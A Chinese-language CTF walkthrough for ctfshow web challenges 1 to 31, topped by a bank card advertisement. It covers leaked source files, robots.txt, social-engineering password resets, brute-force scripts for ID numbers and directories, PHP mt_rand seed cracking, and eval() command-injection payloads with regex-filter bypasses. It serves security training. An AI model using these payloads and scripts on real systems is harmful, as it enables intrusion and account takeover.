可能是世界上第一张木制银行卡

# 现可免费申请,无工本费、快递费、年费,中国可送达。

> 传送门:TreeCard

信息搜集

web1[html]

查看源码

file

ctfshow{874c4342-435b-40e6-96a7-b37ddf723161}

web2[html]

无法右键,直接Ctrl+U或者地址栏开头加上view-source:

file

ctfshow{a3bc8e02-09ce-4cc2-a429-72bd55d9b3f0}

web3[header]

分析流量

file

ctfshow{823de946-8869-473e-8a99-82ca91f4085b}

web4[robots.txt]

查看robots.txt

建议加个收藏夹js,方便快速打开:javascript:window.location = document.location.protocol + "//" + document.location.host + "/robots.txt";

file

file

ctfshow{12de0686-8909-4772-a2b6-b05c55b74215}

web5[.phps]

访问./index.phps

file

ctfshow{07083375-5d54-4ca9-8fcf-001f8c8cba32}

web6[www.zip]

访问./www.zip

file

发现存在fl000g.txt,访问./fl000g.txt

file

ctfshow{1034d16a-721d-4805-83a7-0446a9aa0e5c}

web7[.git/]

访问./.git/

file

ctfshow{63f0f59c-697d-48de-bd60-d9da6f49c7d5}

web8[.svn/]

访问./.svn/

file

ctfshow{daf35dcb-81bf-43a0-8d79-797f16e84555}

web9[.swp]

访问./index.php.swp

file

ctfshow{d3d4c281-86c4-464b-a2ae-6fa6d01b2907}

web10[cookie]

查看cookie,我这用的是Web Developer

file

ctfshow{afbdb2ad-1b92-4f2b-ac21-b3c3358a7500}

web11[域名txt解析]

nslookup -qt=TXT ctfshow.com

file

flag{just_seesee}

web12[社工]

访问./admin/,发现需要登录,猜测用户名为admin,密码为首页页尾的372619038

file

file

ctfshow{e5c0e24d-f03d-4df9-b4db-3b3f3734fc53}

web13[建站模板]

发现页尾存在文档

file

file

按文档指引访问./system1103/login.php,用admin/admin1103登录

file

ctfshow{463d8523-8432-4297-b738-27d9fb837068}

web14[KindEditor 4.1.11]

漏洞前提:配置的文件空间目录不存在

访问./editor/,点击插入文件,选择文件空间,在/var/www/html/nothinghere/fl000g.txt找到flag

file

于是访问./nothinghere/fl000g.txt

file

ctfshow{04cc465c-cbf8-4244-824a-284c038f66f5}

web15[社工]

访问./admin/,发现可以忘记密码

file

file

根据首页底部的qq邮箱查找qq发现资料显示陕西 西安 新城区

file

于是一个一个试过去,使用西安成功重置密码为admin7789,登录

file

ctfshow{f2779cd5-a648-4ac4-bd00-4f38437d7aad}

web16[php探针]

访问./tz.php发现存在探针

file

找到phpinfo选项

file

file

ctfshow{5462980d-256a-470a-a818-b9e19ab09fc6}

web17[域名历史解析]

随便找个能查IP History的网站,我用的是https://viewdns.info/iphistory/

排除掉上一任的解析,以及服务商的国外解析,剩下的第一个IP即为一般情况下的真实IP

file

flag{111.231.70.44}

web18[js]

看一下js,发现分数判定

602163993a514.png

控制台跑一下得到线索110.php

602163ec1a2c0.png

6021641fc3a85.png

ctfshow{326d5b86-f2f6-4b58-a63f-5c4017a1dcfe}

web19[源码注释]

查看html,发现注释未删,可知账号admin,密码的话咋看都是加密过的

602164ae537b2.png

往上看post的代码,发现是aes-cbc加密,密钥和偏移都给了,解就完事

602165861b99e.png

6021660f17b76.png

拿解出来的密码登录

60216630720b7.png

ctfshow{ae62164b-4665-4385-99c3-2637a245f6c6}

web20[.mdb]

访问./db/db.mdb发现文件

6021672422c2f.png

flag{ctfshow_old_database}

爆破

web21[Base Auth]

burp爆就完事,不过要注意burp的过滤并不会自动刷新结果,需要手动再过滤一下

60216dcb9b8f5.png

60216d9803080.png

ctfshow{67950f5e-5f73-4ed1-a3b4-3f6b176784fd}

web22[子域名]

这题裂了,以后再说

web23[php基础]

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 11:43:51
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 11:56:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);

}
?>

写个脚本爆破就完事

<?php
function fuck() {
    foreach (str_split("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") as $i){
    foreach (str_split("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") as $j){
        $Gtoken = $i.$j;
        $token = md5($Gtoken);
        if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
            if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
                return $Gtoken;
            }
        }
    }
    }
    return "";
}

echo fuck();
// ZE

file

ctfshow{f16c4894-48b4-41dd-bf26-e6c3a45a8af8}

web24[mt_srand]

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 13:26:39
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 13:53:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(372619038);
    if(intval($r)===intval(mt_rand())){
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}

?> Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021

php的随机数是根据种子数生成的,所以知道种子数相当于知道了后续所有随机数序列。

<?php
mt_srand(372619038);
echo mt_rand();
//1155388967

file

web25[mt_srand]

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 13:56:57
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 15:47:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(hexdec(substr(md5($flag), 0,8)));
    $rand = intval($r)-intval(mt_rand());
    if((!$rand)){
        if($_COOKIE['token']==(mt_rand()+mt_rand())){
            echo $flag;
        }
    }else{
        echo $rand;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}
Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021

./?r=0得到第一次mt_rand的负值748251799

file

然后用php_mt_seed`爆破种子数吧

file

得到六个对应不同系统环境的种子数,因为上一题我是在php7环境算的,没问题,所有就拿php7去验算一遍。

<?php
function fuck($i){
    mt_srand($i);
    $f = mt_rand();
    if ($f == 748251799){
        return mt_rand()+mt_rand();
    }
}

echo fuck(1448670724)."n";
echo fuck(1448670725)."n";
echo fuck(575534922)."n";
echo fuck(608125702)."n";
echo fuck(2575729271)."n";
echo fuck(2656555094)."n";
//3356577139
//1337536129

然后设一下cookie访问./?r=748251799,在token=3356577139的时候得到flag

file

file

ctfshow{38496b53-16d2-40de-b529-af298b6c4b4a}

web26[抓包]

file

这题很奇怪,直接抓包就能出

file

ctfshow{a0bd74a4-1739-4053-bb15-0a35f5bef6b7}

web27[账号收集]

file

打开发现是个教务系统,首先想着能不能利用下面公开的学生信息直接搞到账号密码

file

file

然后试着用身份证的验算位去爆破合法身份证

file

def checkIDNumber(num_str):
    str_to_int = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5,
                  '6': 6, '7': 7, '8': 8, '9': 9, 'X': 10}
    check_dict = {0: '1', 1: '0', 2: 'X', 3: '9', 4: '8', 5: '7',
                  6: '6', 7: '5', 8: '4', 9: '3', 10: '2'}
    assert len(num_str) == 18
    check_num = 0
    for index, num in enumerate(num_str):
        if index == 17:
            right_code = check_dict.get(check_num % 11)
            if num == right_code:
                return True
            else:
                return False
        check_num += str_to_int.get(num) * (2 ** (17 - index) % 11)

import requests

if __name__ == '__main__':
    for year in range(1990, 2000):
        for month in range(1, 13):
            for day in range(1, 32):
                # print(str(year) + ("0" + str(month))[-2:] + ("0" + str(day))[-2:])
                num_str = '621022' + str(year) + ("0" + str(month))[-2:] + ("0" + str(day))[-2:] + '5237'
                if checkIDNumber(num_str):
                    data = {
                        'a':'高先伊',
                        'p':num_str,
                    }
                    r = requests.post("http://9b942f9a-035b-41a3-9a76-2519aec7e97e.chall.ctf.show:8080/info/checkdb.php", data= data).json()
                    if(r['0'] != "error"):
                        print(num_str)
                        print(num_str)

file

file

ctfshow{02c2feb9-db89-44c6-9e81-eec7c6e50d77}

web28[目录爆破]

这题其实刚开始比较懵逼,因为知道是爆破文件位置但是这无异于大海捞针,当时做的时候没有hint,爆了三四种路径格式才成功。现在直接照着hint给的格式爆就完事

from requests import get

def fuck():
    for i in range(0, 100):
        for j in range(0, 100):
            print(i, j)
            if get(f"http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/{i}/{j}/", allow_redirects=False).status_code != 403:
                return f"http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/{i}/{j}/"

if __name__ == '__main__':
    print(fuck())
# http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/72/20/

file

file

ctfshow{60b39b18-e70c-4cd0-a5e4-7deb336af1f6}

命令执行

web29

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

方法很多,这里给两种操作。(由于浏览器的html解析逻辑,会把php当成注释处理,所以一定要记得看html以保证看到的是真的返回)

// payload
列文件
/?c=echo%20`ls`;
/?c=eval($_GET['d']);&d=echo `ls`;
读文件
/?c=echo `cat fla*`;
/?c=echo `cat fla?.php`;
/?c=eval($_GET['d']);&d=echo `cat flag.php`;

ctfshow{1d5d8d07-8623-4437-80f2-5a2454b9f36d}

web30

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

这题payload可以直接用上一题的,因为咱们用`替代了system,至于php这个文件名的屏蔽,上面payload有两句都是不包含php的。

ctfshow{bb6d3fc9-9491-46bd-884b-1c7a4fd2c15f}

web31

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

这题把空格 和单引号'给过滤了,所以上面的payload都不顶了,不过问题不大,制表符%09可以代替空格。

// payload
列文件
/?c=echo%09`ls`;
读文件
/?c=echo%09`/bin/ca*%09fla*`;

To be Continued


什么都会,但又什么都不会。